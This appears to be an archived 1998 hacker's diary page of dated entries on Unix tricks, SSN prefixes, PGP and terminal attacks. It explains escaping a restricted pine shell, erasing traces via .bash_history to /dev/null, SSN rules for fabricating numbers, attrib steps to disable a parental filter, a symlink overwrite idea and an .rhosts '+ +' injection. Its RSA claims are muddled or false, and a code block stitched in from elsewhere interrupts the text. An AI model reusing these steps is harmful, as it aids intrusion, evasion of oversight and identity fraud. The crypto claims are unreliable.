Anyway, it wrote to a tmp file called /tmp/chpass.xxxxxx (the x's are some combination of numbers, but surprisingly predictable). The tmp file is based (somewhat) on time. So if you made a symbolic link to /bin/bash or something (because chfn is suid root) you could theoretically overwrite bash and cause a nasty denial of service attack. This has really nasty potential. Of course, you would have to write a fairly easy shell script (no, I am not going to write it for you people) to link all the potential files to whatever file it is you wish to overwrite. Mind you, this is all theoretical, and I haven't tested it, but I don't see why it wouldn't work. Okay, goodnight all. Hasta!

_________________________________________________________________

--DATE--1-31-98--SSN--

People have asked me about social security numbers, etc... Not much to say about them. Except for a few numbers issued in the mid 70s, all SSNs have 9 digits. Very few have been issued above 595. Anyone whose SSN is between 700-729 is most likely older, as those were issued by the Railroad Retirement Agency and they haven't been assigned since the early 60s. As far as making your own SSN, here are some rules of thumb: SSNs never end in four zeros. They never start with 73, 79, 6 or 8. Lastly, they very rarely start with 9, as there were very few ever issued. Here is the list of SSN prefixes for the United States and provinces. Stay out of trouble. Hasta!
Alabama                 416-424
Alaska                  574
American Samoa          581-585
Arizona                 526-527, 600-601
Arkansas                429-432
California              545-573, 602-626
Colorado                521-524
Connecticut             040-049
Delaware                221-222
District of Columbia    577-579
Florida                 261-267, 589-595
Georgia                 252-260
Guam                    581-585
Hawaii                  575-576
Idaho                   518-519
Illinois                318-361
Indiana                 303-317
Iowa                    478-485
Kansas                  509-515
Kentucky                400-407
Louisiana               433-439
Maine                   004-007
Maryland                212-220
Massachusetts           010-034
Michigan                362-386
Minnesota               468-477
Mississippi             425-428, 587-588
Missouri                486-500
Montana                 516-517
Nebraska                505-508
Nevada                  530
New Hampshire           001-003
New Jersey              135-158
New Mexico              525, 585
New York                050-134
North Carolina          237-246
North Dakota            501-502
Ohio                    268-302
Oklahoma                440-448
Oregon                  540-544
Pennsylvania            159-211
Philippine Islands      581-585
Puerto Rico             581-585
Rhode Island            035-039
South Carolina          247-251
South Dakota            503-504
Tennessee               408-415
Texas                   449-467
Utah                    528-529
Vermont                 008-009
Virgin Islands          580
Virginia                223-231
Washington              531-539
West Virginia           232-236
Wisconsin               387-399
Wyoming                 520

_________________________________________________________________

--DATE--2-9-98--Breaking out of the pine shell--

Thought I might put a brief entry on here about breaking out of the pine shell. What do I mean by that? Well, there are certain systems (I have personally encountered 4 exactly like this) that restrict telnet access (or try to) by making the shell you use pine (an e-mail editor) versus bash or ksh. (This would be the equivalent of being restricted to Eudora in Windows 95.) You can see why this is annoying. Well, here is one way to break out of the shell. First of all, when pine opens up it goes to a screen that gives you certain commands, one of which is a setup command. You want to select that and then select config. Near the bottom are two lines (space bar down until you can't go any farther). Somewhere near the bottom will be lines saying "speller" and "image viewer". We will just use the first one for the time being.
If it says "Fixed Value 'spell'" or something like that, then you are basically screwed using this method. If it doesn't say that, then you press enter and type the words "/bin/bash" into the input box. Then exit out of there and save your new configuration. Then compose a message and press Control-T. You should get a # sign or something similar. Voila! You now have free rein over your own shell account. If you had chosen to do this with "image viewer", you would have had to send yourself a picture file and then try to use it with the "V" command.

Another nice little trick to remember is that if you have access to a shell account, more than likely it also has FTP installed. There is nothing stopping you from uploading files (like a .profile or .login file) that will open /bin/bash before you ever have a chance to load pine up. All useful tricks in a pinch. Very sloppy though, and you WILL leave traces (.bash_history), so be careful and make sure to link your .bash_history to the null device to cover your tracks (or go back through FTP and delete your .bash_history and .profile if you put a new one there). You can link your .bash_history to the null device with this command: "ln -s /dev/null .bash_history". Stay out of trouble now! Hasta!

_________________________________________________________________

--DATE--3-17-98--PGP BREAKABLE???--

Okay, I was talking to a local PGP freak today for quite some time, and he told me some things of interest involving PGP. First of all, this is mostly theory and very little practice, but this could lead the way toward some massive attacks against the RSA algorithm. Let's say you have plaintext (P) and public key (Kp). When you encrypt P with Kp you get cyphertext (C). Pretty simple, right? Okay, here is where it gets a little nasty. It turns out that if you encrypt C with Kp multiple times, eventually it will lead back to P with O iterations.
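The "encrypt C with Kp again and again until P comes back" observation, run on a toy RSA key, as an added example that is not the page's or the PGP freak's code. The key (p=61, q=53, e=17, d=2753) and the message are constructed textbook values; on real key sizes the number of iterations is astronomically large, which is why this is a fact about RSA's structure rather than a practical break.

```c
/* Added example, not from the page: RSA cycling on a toy key.
 * Constructed values: n = 61*53 = 3233, e = 17, d = 2753, P = 65. */
#include <stdio.h>
#include <stdint.h>

/* base^exp mod m, overflow-free for m < 2^32 */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t result = 1;
    base %= m;
    while (exp > 0) {
        if (exp & 1) result = (result * base) % m;
        base = (base * base) % m;
        exp >>= 1;
    }
    return result;
}

/* Re-encrypt c under the public key (e, n) until c itself reappears.
 * Since x -> x^e mod n is a bijection, the value seen just before c is the
 * plaintext P (the page's "it will lead back to P"). Returns that value and
 * stores the number of encryptions in *steps (the page's O); returns 0 with
 * *steps = 0 if max_iter is exhausted. */
uint64_t recover_by_cycling(uint64_t c, uint64_t e, uint64_t n,
                            uint64_t max_iter, uint64_t *steps)
{
    uint64_t prev = c, cur;
    for (uint64_t i = 1; i <= max_iter; i++) {
        cur = modpow(prev, e, n);       /* encrypt the ciphertext again */
        if (cur == c) {
            *steps = i;
            return prev;                /* one step before c: the plaintext */
        }
        prev = cur;
    }
    *steps = 0;
    return 0;
}

int main(void)
{
    const uint64_t n = 61 * 53, e = 17, d = 2753;   /* constructed toy key */
    uint64_t m = 65;
    uint64_t c = modpow(m, e, n);                   /* C = P^e mod n */
    uint64_t steps;
    uint64_t guess = recover_by_cycling(c, e, n, 1000000, &steps);
    printf("P=%llu C=%llu; C came back after %llu encryptions, value before it: %llu\n",
           (unsigned long long)m, (unsigned long long)c,
           (unsigned long long)steps, (unsigned long long)guess);
    printf("check: decrypting with d gives %llu\n", (unsigned long long)modpow(c, d, n));
    return 0;
}
```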
There is ALSO another way to break C back to P: there are other variations of bits that are close enough that they will break the cyphertext, called o. o occurs much more often than the guaranteed O and works almost as well. o and O depend greatly on the prime number used during encryption. (Essentially, when asked if you want quick prime-number generation, always say no.) Strong prime numbers are prime numbers that, when a computation is made (something like (x/2)+1) on the prime number, it creates another prime number. Strong-strong prime numbers are where you can do the operation twice and achieve another prime number. Okay, so that is our main attack now: breaking it through brute force. Dealing with mod256 this is doable, but when you get to military grade encryption, 1024 or 2048 bits, you are dealing with a whole new problem. Yes, it is exhaustively possible, but it would take more seconds to do than in the universe's history. Okay, so here is where our second attack comes into play. It turns out (mathematically) that portions (fractions) of bits are leaked each time you encrypt something. So if your target sends you 10,000 messages you might shave off 500 bits (a HUGE reduction in security = 2^1024 - 2^500). That logarithmically halves the security on industry grade RSA. The end result is that through a combination of brute force attacks on C with Kp and attacks on leaked bits, the RSA algorithm becomes breakable. Scary, huh? Hasta!

_________________________________________________________________

--DATE--3-18-98--PGP BREAKABLE?? II--

This is more on the above topic. This is my reply to his reply. I hope you understand. ;) Hasta!

| This sounds exactly like the attack you can accomplish with ROT13, if you
| don't want to take the task to pen&paper, just use ROT13 three times and
| you get the original message. No fuss...no muss......

Wait, that IS the whole point of ROT13! But it should only be ONE iteration to get back from C to P.
IE:

    [8 leprosy/user/s2/rsnake/bin] cat rot13.c
    #include <stdio.h>
    int main() {
        int c;
        while ((c = getchar()) != EOF) {
            if (c >= 'a' && c <= 'm') c = c + 13;
            else if (c >= 'n' && c <= 'z') c = c - 13;
            else if (c >= 'A' && c <= 'M') c = c + 13;
            else if (c >= 'N' && c <= 'Z') c = c - 13;
            putchar(c);
        }
        return 0;
    }
    [9 leprosy/user/s2/rsnake/bin] gcc rot13.c -o rot13
    [10 leprosy/user/s2/rsnake/bin] rot13
    Hello, this is a test.
    Uryyb, guvf vf n grfg.
    ^C
    [11 leprosy/user/s2/rsnake/bin] rot13
    Uryyb, guvf vf n grfg.
    Hello, this is a test.
    ^C
    [12 leprosy/user/s2/rsnake/bin]

| This is only *possible* if you have a few hundred years on your hands & a cray
| super'puter.

With mod256? I think it is a little more doable than a couple hundred years. I don't know the exact numbers, but it should be possible within a few months (assuming you find an o that works and not the true O). Remember, we aren't trying to completely crack C, we are only trying to get a close approximation. If you get close enough, you will be able to understand the P, although possibly missing one character, or the structure of the text (but in the end the gist of the message has been revealed). Not 100% reliable, but most certainly broken.

| Not really....seeing how the majority of the messages that people use
| encryption to keep private are *time-sensitive*......thus, if someone were
| to obtain a piece of encrypted mail from me intended for you RSnake...by
| the time they have run their bruteforces & multiple encrypt sessions on
| it....the information will be of VERY LITTLE VALUE! Think about
| it.......unless you have set-up a NTFS to encrypt data on every write &
| decrypt data on every read on your HD....then the messages that you send to
| someone using strong crypto (*in todays convention anywayz*) usually
| contains info that is imperative upon a SPEEDY reply/action.
| If
| not....then I would take every precaution to encrypt the message AT LEAST
| 4-6 times....then hide the message using steganography inside a B&W
| *.bmp....this way..the message blends easier with the normal data noise
| from the bmp. Just my opinion though.......always open for
| discussion.....usually ending in my opinion changing! ;)

First of all, your method is the ONLY way, I believe, to truly hide information. Steganography is an art which few people understand. Steganography, I believe, will have more of a following once people realize it is just a matter of time before modern computers and math can decrypt anything thrown at them. After talking to Kwan (the man who wrote SNOW and the ICE crypt function) I now believe that steganography is a better failsafe than any level of crypt. If they don't know something is crypted, they won't bother to crack it. Simple logic. Remove the element of curiosity. I was briefly talking to a "spy" for the Air Force, whose job it was to accept incoming captured PGP messages via radio, log them, and do some sort of decryption on the messages he got. Not to decrypt it completely, but to try to evaluate the RSA algorithm used, to make it potentially weaker for future conversations. With this sort of loss in security (hundreds of bits) you could potentially decrypt incoming messages in a matter of hours. If this "spy" was doing what I think he was doing, he is merely logging information, so that later, finding out the P would be relatively easy. Starting now could potentially make breaking PGP in 5 years as trivial as breaking crypt login(1) is now. Of course there will always be a better version of PGP, but for those people who don't bother to use strong-strong primes and for those who don't bother to make their messages time sensitive, their days are numbered. ;)

_________________________________________________________________

--DATE--4-1-98--X STOP--

Here is a letter I received about a blocking program called X Stop.
| Hey there, My friend is having a "problem" with his computer. His parents
| put "X Stop" on his computer. It's one of those block or filter "bad"
| internet site things. I told him to mail, but ironically enough, yours is
| blocked! :) Anyways, I've been trying to help him, but the 2 files
| (C:\windows\system\xblock95.dll and c:\windows\system\xstop95.exe) are
| file protected so they can't be corrupted and what not. If you know any way
| to stop this program short of formatting could you please tell me? I only
| ask you because I saw that earlier article on how to stop Full Armor or
| something like that. Sorry for the long letter :)
| Cya!

    C:\>attrib /?
    Displays or changes file attributes.

    ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] [[drive:][path]filename] [/S]

      +   Sets an attribute.
      -   Clears an attribute.
      R   Read-only file attribute.
      A   Archive file attribute.
      S   System file attribute.
      H   Hidden file attribute.
      /S  Processes files in all directories in the specified path.

Hello. First let me say that I laughed out loud at that "ironically enough" story. ;) Okay, on to the question. I have never encountered this problem, but from your description it should be fairly easy. Go into MS-DOS and use the attrib command (the help text above shows the syntax). First do an attrib on those two files. It will have an R or an A preceding the files. To make the files writable or un-archive them, simply type:

    attrib -R xblock95.dll
    attrib -R xstop95.exe

or

    attrib -A xblock95.dll
    attrib -A xstop95.exe

That should make the files manipulable so you can either corrupt them or move them. I hope that helps. Hasta!

_________________________________________________________________

--DATE--4-21-98--Mindless Babbling--

| On your little page about hacking you said:
|
| Something that has come about recently in the news is the new ping
| bug. Ok, let me dispel some things about this weakness.
| First of all
| it is VERY traceable
|
| But isn't the ip address tagged onto ICMP packets application layer
| specific and therefore spoofable?...and since you don't ever really NEED
| to receive a reply from an ICMP packet...you can make it look like it
| came from anywhere you like? And keeping this in mind, isn't it possible
| then to spoof ICMP packets with a request for echo reply and thus take
| down two machines with one fell swoop?

Well... you can spoof the packets, yes, but you cannot take down two machines at once. Once a machine that is vulnerable is attacked with the ICMP packet it cannot echo reply (because it is down). Therefore you could not receive an echo from it. Also, this is NOT untraceable if the machine you are attacking is running a current version of Bind or is watching netstat. It would be less traceable, surely; however, far from perfect.

| and...
|
| >Uhm, Carnie? Just to clarify, that "virus" is just a chain mail.
| >It is totally impossible to send a virus over e-mail, it is totally
| >impossible to activate it by reading it (as e-mail is not an
| >executable file, it is just text
|
| But is it not possible for a malicious author of an email client or
| filter program to have a portion of code triggered by a particular
| string of text?

Of course it is. We have to rely on the validity of the code we are currently using. The same is true with the operating system you are using: you trust it is valid and that backdoors aren't built into it, for the most part. I wouldn't put it past Microsoft or any small software firms, but for the most part I think that is a fairly paranoid perspective (that backdoors are intentionally installed). If you are really worried about it, code your own e-mail client and give out the source so people know you aren't making a backdoor yourself. ;)

| and...about flash.c
|
| If the victim is running vt100 and has mesg y, you can mess him up pretty
| bad with this.
| I have seen it not work, in some instances, but usually
| it does
|
| It is possible using escape sequences to request an echo from a Wyse50
| Terminal...so you can send a command like echo "+ +" > ~/.rhosts and
| request an echo from the terminal...which will make the user run the
| command...but you prolly already knew that.

Right, but that type of system is pretty out-dated. The term attack is not really an exploit; it is more of a trick, or a DoS if you do it right. What you are talking about is using the Wyse system to execute arbitrary commands. Your attack is completely different from the flash.c attack. I have never tried that attack, because I have never had access to a Wyse system. I will say that there are similar attacks that can be run from inside networks. Spoofing from the inside of a network, you can get machines to essentially give you information about the NFS, and if the machines don't force you to authenticate it is trivial to get access to the primary name server. Active spoofing is often times more productive than passive sniffing on sub-nets. Anyway, that's enough babbling for today. Hasta!

_________________________________________________________________

--END--

_________________________________________________________________

This page was created using vi (for UNIX 10.20) and Lemmy (ver 2.0b for Windows '95). It was created to work with Lynx, and all graphical and nongraphical browsers alike. If you don't like the formatting, tell me a better way to do it and I will be more than happy to let you rewrite about 200k worth of hacking text for me.

_________________________________________________________________

No death threats or poetry please. Just kidding, no poetry please.